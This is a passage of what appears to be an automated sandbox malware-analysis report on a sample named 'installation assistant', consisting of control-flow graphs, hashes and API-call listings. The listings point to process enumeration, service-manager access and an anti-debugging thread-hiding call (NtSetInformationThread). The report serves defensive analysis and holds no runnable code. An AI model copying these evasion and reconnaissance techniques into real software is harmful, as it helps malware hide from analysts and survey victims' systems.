                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: }jk$;T55$L@^
                                          • API String ID: 0-4218709813
                                          • Opcode ID: 861286d6b7e1b9f76b1ecedcee8d6d49d2efbccdb3e37ddee1a06f5c473a2d33
                                          • Instruction ID: 3aff750909e00aefe073f5731332811bdbfc0cb2f1976300dfe6d31182aedd9d
                                          • Opcode Fuzzy Hash: 861286d6b7e1b9f76b1ecedcee8d6d49d2efbccdb3e37ddee1a06f5c473a2d33
                                          • Instruction Fuzzy Hash: 6D341971645B018FC728CF28C8D0695B7F3EF95318B1E8A6DC0968BB55EB34B58ACB50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 7677 6cc45240-6cc45275 CreateToolhelp32Snapshot 7678 6cc452a0-6cc452a9 7677->7678 7679 6cc452e0-6cc452e5 7678->7679 7680 6cc452ab-6cc452b0 7678->7680 7681 6cc45377-6cc453a1 call 6cc52c05 7679->7681 7682 6cc452eb-6cc452f0 7679->7682 7683 6cc45315-6cc4531a 7680->7683 7684 6cc452b2-6cc452b7 7680->7684 7681->7678 7685 6cc45277-6cc45292 CloseHandle 7682->7685 7686 6cc452f2-6cc452f7 7682->7686 7687 6cc453a6-6cc453ab 7683->7687 7688 6cc45320-6cc45332 Process32NextW 7683->7688 7690 6cc45334-6cc4535d call 6cc4b920 Process32FirstW 7684->7690 7691 6cc452b9-6cc452be 7684->7691 7685->7678 7686->7678 7693 6cc452f9-6cc45313 7686->7693 7687->7678 7697 6cc453b1-6cc453bf 7687->7697 7694 6cc45362-6cc45372 7688->7694 7690->7694 7691->7678 7692 6cc452c0-6cc452d1 7691->7692 7692->7678 7693->7678 7694->7678
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6CC4524E
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: CreateSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 3332741929-0
                                          • Opcode ID: 21b387dd9c27b28afb4150459c57f9145a864f2fdcdd90aee691105c0aa81fd5
                                          • Instruction ID: 3b9e8b65989b364b3988870c062c9a558323955cfe3f433b618b5de849ef03ec
                                          • Opcode Fuzzy Hash: 21b387dd9c27b28afb4150459c57f9145a864f2fdcdd90aee691105c0aa81fd5
                                          • Instruction Fuzzy Hash: EE315E786083009FD7209F29C888B0ABBF5BF95758F51C92EE998C7360E371D8488B52

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 7821 6cac3886-6cac388e 7822 6cac3894-6cac3896 7821->7822 7823 6cac3970-6cac397d 7821->7823 7822->7823 7824 6cac389c-6cac38b9 7822->7824 7825 6cac397f-6cac3989 7823->7825 7826 6cac39f1-6cac39f8 7823->7826 7830 6cac38c0-6cac38c1 7824->7830 7825->7824 7827 6cac398f-6cac3994 7825->7827 7828 6cac39fe-6cac3a03 7826->7828 7829 6cac3ab5-6cac3aba 7826->7829 7831 6cac399a-6cac399f 7827->7831 7832 6cac3b16-6cac3b18 7827->7832 7833 6cac3a09-6cac3a2f 7828->7833 7834 6cac38d2-6cac38d4 7828->7834 7829->7824 7836 6cac3ac0-6cac3ac7 7829->7836 7835 6cac395e 7830->7835 7837 6cac383b-6cac3855 call 6cc11470 call 6cc11480 7831->7837 7838 6cac39a5-6cac39bf 7831->7838 7832->7830 7839 6cac38f8-6cac3955 7833->7839 7840 6cac3a35-6cac3a3a 7833->7840 7841 6cac3957-6cac395c 7834->7841 7842 6cac3960-6cac3964 7835->7842 7836->7830 7843 6cac3acd-6cac3ad6 7836->7843 7849 6cac3860-6cac3885 7837->7849 7844 6cac3a5a-6cac3a5d 7838->7844 7839->7841 7845 6cac3b1d-6cac3b22 7840->7845 7846 6cac3a40-6cac3a57 7840->7846 7841->7835 7848 6cac396a 7842->7848 7842->7849 7843->7832 7850 6cac3ad8-6cac3aeb 7843->7850 7854 6cac3aa9-6cac3ab0 7844->7854 7852 6cac3b49-6cac3b50 7845->7852 7853 6cac3b24-6cac3b44 7845->7853 7846->7844 7856 6cac3ba1-6cac3bb6 7848->7856 7849->7821 7850->7839 7857 6cac3af1-6cac3af8 7850->7857 7852->7830 7862 6cac3b56-6cac3b5d 7852->7862 7853->7854 7854->7842 7863 6cac3bc0-6cac3bda call 6cc11470 call 6cc11480 7856->7863 7858 6cac3afa-6cac3aff 7857->7858 7859 6cac3b62-6cac3b85 7857->7859 7858->7841 7859->7839 7866 6cac3b8b 7859->7866 7862->7842 7872 6cac3be0-6cac3bfe 7863->7872 7866->7856 7875 6cac3e7b 7872->7875 7876 6cac3c04-6cac3c11 7872->7876 7879 6cac3e81-6cac3ee0 call 6cac3750 GetCurrentThread NtSetInformationThread 7875->7879 7877 6cac3c17-6cac3c20 7876->7877 7878 6cac3ce0-6cac3cea 7876->7878 7880 6cac3dc5 7877->7880 7881 6cac3c26-6cac3c2d 7877->7881 7882 6cac3cec-6cac3d0c 7878->7882 7883 6cac3d3a-6cac3d3c 7878->7883 7898 
6cac3eea-6cac3f04 call 6cc11470 call 6cc11480 7879->7898 7887 6cac3dc6 7880->7887 7885 6cac3dc3 7881->7885 7886 6cac3c33-6cac3c3a 7881->7886 7888 6cac3d90-6cac3d95 7882->7888 7889 6cac3d3e-6cac3d45 7883->7889 7890 6cac3d70-6cac3d8d 7883->7890 7885->7880 7892 6cac3e26-6cac3e2b 7886->7892 7893 6cac3c40-6cac3c5b 7886->7893 7894 6cac3dc8-6cac3dcc 7887->7894 7896 6cac3dba-6cac3dc1 7888->7896 7897 6cac3d97-6cac3db8 7888->7897 7895 6cac3d50-6cac3d57 7889->7895 7890->7888 7901 6cac3c7b-6cac3cd0 7892->7901 7902 6cac3e31 7892->7902 7903 6cac3e1b-6cac3e24 7893->7903 7894->7872 7904 6cac3dd2 7894->7904 7895->7887 7896->7885 7900 6cac3dd7-6cac3ddc 7896->7900 7897->7880 7915 6cac3f75-6cac3fa1 7898->7915 7906 6cac3dde-6cac3e17 7900->7906 7907 6cac3e36-6cac3e3d 7900->7907 7901->7895 7902->7863 7903->7894 7908 6cac3e76-6cac3e79 7903->7908 7904->7908 7906->7903 7911 6cac3e5c-6cac3e5f 7907->7911 7912 6cac3e3f-6cac3e5a 7907->7912 7908->7879 7911->7901 7914 6cac3e65-6cac3e69 7911->7914 7912->7903 7914->7894 7914->7908 7919 6cac4020-6cac4026 7915->7919 7920 6cac3fa3-6cac3fa8 7915->7920 7921 6cac402c-6cac403c 7919->7921 7922 6cac3f06-6cac3f35 7919->7922 7923 6cac407c-6cac4081 7920->7923 7924 6cac3fae-6cac3fcf 7920->7924 7925 6cac403e-6cac4058 7921->7925 7926 6cac40b3-6cac40b8 7921->7926 7929 6cac3f38-6cac3f61 7922->7929 7927 6cac40aa-6cac40ae 7923->7927 7928 6cac4083-6cac408a 7923->7928 7924->7927 7930 6cac405a-6cac4063 7925->7930 7926->7924 7932 6cac40be-6cac40c9 7926->7932 7933 6cac3f6b-6cac3f6f 7927->7933 7928->7929 7931 6cac4090 7928->7931 7934 6cac3f64-6cac3f67 7929->7934 7936 6cac4069-6cac406c 7930->7936 7937 6cac40f5-6cac413f 7930->7937 7931->7898 7938 6cac40a7 7931->7938 7932->7927 7939 6cac40cb-6cac40d4 7932->7939 7933->7915 7935 6cac3f69 7934->7935 7935->7933 7940 6cac4144-6cac414b 7936->7940 7941 6cac4072-6cac4077 7936->7941 7937->7935 7938->7927 7939->7938 7942 6cac40d6-6cac40f0 7939->7942 7940->7933 7941->7934 7942->7930
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 64d5634443ad181005f22af637932356fad69250431fae0fc5457123a08411ec
                                          • Instruction ID: fadbcd298f32499287ae070ca4e7ef502ab346aa760fc3d77ce8b796c6764455
                                          • Opcode Fuzzy Hash: 64d5634443ad181005f22af637932356fad69250431fae0fc5457123a08411ec
                                          • Instruction Fuzzy Hash: 4232D132346B018FC324CF29C8D06E5B7E3EF9131476D8A6CC0EA5BA95D775B48A8B51

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 7969 6cac3a6a-6cac3a85 7970 6cac3a87-6cac3aa7 7969->7970 7971 6cac3aa9-6cac3ab0 7970->7971 7972 6cac3960-6cac3964 7971->7972 7973 6cac396a 7972->7973 7974 6cac3860-6cac388e 7972->7974 7976 6cac3ba1-6cac3bb6 7973->7976 7983 6cac3894-6cac3896 7974->7983 7984 6cac3970-6cac397d 7974->7984 7978 6cac3bc0-6cac3bda call 6cc11470 call 6cc11480 7976->7978 7994 6cac3be0-6cac3bfe 7978->7994 7983->7984 7986 6cac389c-6cac38b9 7983->7986 7988 6cac397f-6cac3989 7984->7988 7989 6cac39f1-6cac39f8 7984->7989 7993 6cac38c0-6cac38c1 7986->7993 7988->7986 7990 6cac398f-6cac3994 7988->7990 7991 6cac39fe-6cac3a03 7989->7991 7992 6cac3ab5-6cac3aba 7989->7992 7996 6cac399a-6cac399f 7990->7996 7997 6cac3b16-6cac3b18 7990->7997 7998 6cac3a09-6cac3a2f 7991->7998 7999 6cac38d2-6cac38d4 7991->7999 7992->7986 8001 6cac3ac0-6cac3ac7 7992->8001 8000 6cac395e 7993->8000 8009 6cac3e7b 7994->8009 8010 6cac3c04-6cac3c11 7994->8010 8003 6cac383b-6cac3855 call 6cc11470 call 6cc11480 7996->8003 8004 6cac39a5-6cac39bf 7996->8004 7997->7993 8005 6cac38f8-6cac3955 7998->8005 8006 6cac3a35-6cac3a3a 7998->8006 8007 6cac3957-6cac395c 7999->8007 8000->7972 8001->7993 8008 6cac3acd-6cac3ad6 8001->8008 8003->7974 8011 6cac3a5a-6cac3a5d 8004->8011 8005->8007 8012 6cac3b1d-6cac3b22 8006->8012 8013 6cac3a40-6cac3a57 8006->8013 8007->8000 8008->7997 8015 6cac3ad8-6cac3aeb 8008->8015 8020 6cac3e81-6cac3ee0 call 6cac3750 GetCurrentThread NtSetInformationThread 8009->8020 8016 6cac3c17-6cac3c20 8010->8016 8017 6cac3ce0-6cac3cea 8010->8017 8011->7971 8018 6cac3b49-6cac3b50 8012->8018 8019 6cac3b24-6cac3b44 8012->8019 8013->8011 8015->8005 8022 6cac3af1-6cac3af8 8015->8022 8025 6cac3dc5 8016->8025 8026 6cac3c26-6cac3c2d 8016->8026 8028 6cac3cec-6cac3d0c 8017->8028 8029 6cac3d3a-6cac3d3c 8017->8029 8018->7993 8027 6cac3b56-6cac3b5d 8018->8027 8019->7970 8047 6cac3eea-6cac3f04 call 6cc11470 call 6cc11480 8020->8047 8023 6cac3afa-6cac3aff 8022->8023 8024 
6cac3b62-6cac3b85 8022->8024 8023->8007 8024->8005 8034 6cac3b8b 8024->8034 8035 6cac3dc6 8025->8035 8032 6cac3dc3 8026->8032 8033 6cac3c33-6cac3c3a 8026->8033 8027->7972 8036 6cac3d90-6cac3d95 8028->8036 8037 6cac3d3e-6cac3d45 8029->8037 8038 6cac3d70-6cac3d8d 8029->8038 8032->8025 8041 6cac3e26-6cac3e2b 8033->8041 8042 6cac3c40-6cac3c5b 8033->8042 8034->7976 8043 6cac3dc8-6cac3dcc 8035->8043 8045 6cac3dba-6cac3dc1 8036->8045 8046 6cac3d97-6cac3db8 8036->8046 8044 6cac3d50-6cac3d57 8037->8044 8038->8036 8050 6cac3c7b-6cac3cd0 8041->8050 8051 6cac3e31 8041->8051 8052 6cac3e1b-6cac3e24 8042->8052 8043->7994 8053 6cac3dd2 8043->8053 8044->8035 8045->8032 8049 6cac3dd7-6cac3ddc 8045->8049 8046->8025 8064 6cac3f75-6cac3fa1 8047->8064 8055 6cac3dde-6cac3e17 8049->8055 8056 6cac3e36-6cac3e3d 8049->8056 8050->8044 8051->7978 8052->8043 8057 6cac3e76-6cac3e79 8052->8057 8053->8057 8055->8052 8060 6cac3e5c-6cac3e5f 8056->8060 8061 6cac3e3f-6cac3e5a 8056->8061 8057->8020 8060->8050 8063 6cac3e65-6cac3e69 8060->8063 8061->8052 8063->8043 8063->8057 8068 6cac4020-6cac4026 8064->8068 8069 6cac3fa3-6cac3fa8 8064->8069 8070 6cac402c-6cac403c 8068->8070 8071 6cac3f06-6cac3f35 8068->8071 8072 6cac407c-6cac4081 8069->8072 8073 6cac3fae-6cac3fcf 8069->8073 8074 6cac403e-6cac4058 8070->8074 8075 6cac40b3-6cac40b8 8070->8075 8078 6cac3f38-6cac3f61 8071->8078 8076 6cac40aa-6cac40ae 8072->8076 8077 6cac4083-6cac408a 8072->8077 8073->8076 8079 6cac405a-6cac4063 8074->8079 8075->8073 8081 6cac40be-6cac40c9 8075->8081 8082 6cac3f6b-6cac3f6f 8076->8082 8077->8078 8080 6cac4090 8077->8080 8083 6cac3f64-6cac3f67 8078->8083 8085 6cac4069-6cac406c 8079->8085 8086 6cac40f5-6cac413f 8079->8086 8080->8047 8087 6cac40a7 8080->8087 8081->8076 8088 6cac40cb-6cac40d4 8081->8088 8082->8064 8084 6cac3f69 8083->8084 8084->8082 8089 6cac4144-6cac414b 8085->8089 8090 6cac4072-6cac4077 8085->8090 8086->8084 8087->8076 8088->8087 8091 6cac40d6-6cac40f0 8088->8091 8089->8082 8090->8083 8091->8079
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: CurrentThread
                                          • String ID:
                                          • API String ID: 2882836952-0
                                          • Opcode ID: 7b5890bd38e4c5aec97b3a6251f6429efbbd7689eaeec80178cc809aafcecdfe
                                          • Instruction ID: 5ac3a2ac0ff82e1c62578fb99119a8819cfb2e56c4a9327e3d062666d57b5a23
                                          • Opcode Fuzzy Hash: 7b5890bd38e4c5aec97b3a6251f6429efbbd7689eaeec80178cc809aafcecdfe
                                          • Instruction Fuzzy Hash: E251C07124A7018FC3208F29C4807D5B7F3BF95314F698A5DC0E61BA95DB75B48A8B82
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: CurrentThread
                                          • String ID:
                                          • API String ID: 2882836952-0
                                          • Opcode ID: 236aec8ba5dc7e53bc337598b211d9d67efbc002a406451b188a83e516410681
                                          • Instruction ID: b83e0b4a57306f89ebffeee17dea327a4772de8a6cbfeb586d64f70d6c3027fe
                                          • Opcode Fuzzy Hash: 236aec8ba5dc7e53bc337598b211d9d67efbc002a406451b188a83e516410681
                                          • Instruction Fuzzy Hash: B751B171209B018BC320CF29C4807D5B7F3BF95314F698A1DC0E65BA95DB75B48A8B92
                                          APIs
                                          • GetCurrentThread.KERNEL32 ref: 6CAC3E9D
                                          • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CAC3EAA
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: Thread$CurrentInformation
                                          • String ID:
                                          • API String ID: 1650627709-0
                                          • Opcode ID: 72c289201ceb3b8d152e3d6a24139a074b8cd59c1f3798e8d68941532d10da6f
                                          • Instruction ID: b06e04a3eeeec710204fc9d02c47c01b5fd2f77d3e5b5b27210d0ea0ea7fa016
                                          • Opcode Fuzzy Hash: 72c289201ceb3b8d152e3d6a24139a074b8cd59c1f3798e8d68941532d10da6f
                                          • Instruction Fuzzy Hash: 2531013124AB01CFD720CF28C8847D6B7B3AF96314F198E1DC0E65BA80DB7870899B52
                                          APIs
                                          • GetCurrentThread.KERNEL32 ref: 6CAC3E9D
                                          • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CAC3EAA
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: Thread$CurrentInformation
                                          • String ID:
                                          • API String ID: 1650627709-0
                                          • Opcode ID: 811b2df456b06115bad2a06226df1c1b1b1523603e43a5db1cf5ebba0c391ce8
                                          • Instruction ID: 0476a9c31ad73192153e2ffd279962991b452052b42c3628042317826c4368ec
                                          • Opcode Fuzzy Hash: 811b2df456b06115bad2a06226df1c1b1b1523603e43a5db1cf5ebba0c391ce8
                                          • Instruction Fuzzy Hash: 3631EF31209B01CFD724CF28C4907E6B7B6AF96308F294E1DC0E65BA85DB7574898B92
                                          APIs
                                          • GetCurrentThread.KERNEL32 ref: 6CAC3E9D
                                          • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CAC3EAA
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: Thread$CurrentInformation
                                          • String ID:
                                          • API String ID: 1650627709-0
                                          • Opcode ID: dee296a3d724d897ce0962706295484e4c6cb2e1010065632a796a2a7c85f00e
                                          • Instruction ID: f8303ae6c18660c93f50b86772ed88b16ca224669d15cbb2203a818dcd9aa228
                                          • Opcode Fuzzy Hash: dee296a3d724d897ce0962706295484e4c6cb2e1010065632a796a2a7c85f00e
                                          • Instruction Fuzzy Hash: 5521F470359701CFD724CF29C8907E677B6AF52308F184E1DC0E64BA90DB75A4889B93
                                          APIs
                                          • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6CC45130
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: ManagerOpen
                                          • String ID:
                                          • API String ID: 1889721586-0
                                          • Opcode ID: e0653267e4c66c3e3ba7a78866f2ee0bc911f2ee1a707312cd03765e75ffe0cf
                                          • Instruction ID: 4bc22fbdd3b6111657df08bca25211985d3c98c00afa118251cd031054350b17
                                          • Opcode Fuzzy Hash: e0653267e4c66c3e3ba7a78866f2ee0bc911f2ee1a707312cd03765e75ffe0cf
                                          • Instruction Fuzzy Hash: B43123B4608341EFD7109F29C584A4ABBF0BB89768F50C95AF988C6360D371C9499B62
                                          APIs
                                          • FindFirstFileA.KERNEL32(?,?), ref: 6CC3AEDC
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: FileFindFirst
                                          • String ID:
                                          • API String ID: 1974802433-0
                                          • Opcode ID: 2fc8cd8fc435780ff4febbfb599270ee8764f71c024f2e8a38099088ab559aa0
                                          • Instruction ID: 4257833461ca9710d44da0e7754e4df9e1607e6a0318cbc531439aef341b52ea
                                          • Opcode Fuzzy Hash: 2fc8cd8fc435780ff4febbfb599270ee8764f71c024f2e8a38099088ab559aa0
                                          • Instruction Fuzzy Hash: 80113AB45083609FDB109F69E94450E7BE4BFCA314F149E59F4ACCB6A1E334CC958B62
                                          APIs
                                          • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6CC1ABA7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                                          • API String ID: 2738559852-1563143607
                                          • Opcode ID: e0d9535515b9245b724f1fd1c618b6742a6493f8760951c9c262fd951d7330e2
                                          • Instruction ID: 6b2ae273f17762694d7818f95abefc5803e79c571fbb016f567c3c65414925d5
                                          • Opcode Fuzzy Hash: e0d9535515b9245b724f1fd1c618b6742a6493f8760951c9c262fd951d7330e2
                                          • Instruction Fuzzy Hash: 86625AB060D3818FC724CF1AC490A5ABBE2ABD9314F248D1EE599C7B50E734E9499B42

                                          Control-flow Graph (rendered figure; legend: Executed / Not Executed; edge list omitted). API calls shown on the graph: ReadFile, GetConsoleMode, ReadConsoleW, GetLastError.
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8Q
